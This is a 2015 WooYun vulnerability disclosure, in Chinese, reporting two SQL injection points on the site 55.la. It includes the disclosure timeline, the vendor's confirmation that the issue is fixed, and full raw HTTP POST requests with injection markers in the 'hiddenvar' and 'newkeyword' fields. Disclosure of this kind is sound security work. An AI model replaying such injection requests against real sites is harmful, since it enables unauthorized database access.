当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-089809

漏洞标题:我拉网某2处注入

相关厂商:55.la

漏洞作者: BMa

提交时间:2015-01-03 20:44

修复时间:2015-02-17 20:46

公开时间:2015-02-17 20:46

漏洞类型:SQL注射漏洞

危害等级:中

自评Rank:10

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-01-03: 细节已通知厂商并且等待厂商处理中
2015-01-04: 厂商已经确认,细节仅向厂商公开
2015-01-14: 细节向核心白帽子及相关领域专家公开
2015-01-24: 细节向普通白帽子公开
2015-02-03: 细节向实习白帽子公开
2015-02-17: 细节向公众公开

简要描述:

我拉网某2处注入

详细说明:

第一处,参数:hiddenvar

POST /run/index_do.php HTTP/1.1
Content-Length: 701
Content-Type: multipart/form-data; boundary=-----AcunetixBoundary_ISHHVOWXSD
Referer: http://www.55.la:80/
Cookie: PHPSESSID=fefch5si80jnngd13kmlk76717
Host: www.55.la
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="B1"
####
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="bprice"
0
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="cn"
99
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="en"
99
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="hiddenvar"
1*
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="T1"
2##2## ##########
-------AcunetixBoundary_ISHHVOWXSD
Content-Disposition: form-data; name="T2"
55.La ########## ######################
-------AcunetixBoundary_ISHHVOWXSD--


第二处,参数:newkeyword

POST /run/search_do.php HTTP/1.1
Content-Length: 54
Content-Type: application/x-www-form-urlencoded
Referer: http://www.55.la:80/
Cookie: PHPSESSID=fefch5si80jnngd13kmlk76717
Host: www.55.la
Connection: Keep-alive
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/5.0 (Linux; U; Android 4.0.3; en-us; LG-L160L Build/IML74K) AppleWebkit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safari/534.30
Accept: */*
class=&newclassid=1&newkeyword=1*%22&newtypeid=0&type=

漏洞证明:

1.jpg


2.jpg


修复方案:

凑齐300可好?

版权声明:转载请注明来源 BMa@乌云


漏洞回应

厂商回应:

危害等级:高

漏洞Rank:18

确认时间:2015-01-04 16:21

厂商回复:

已经修复,请测试

最新状态:

暂无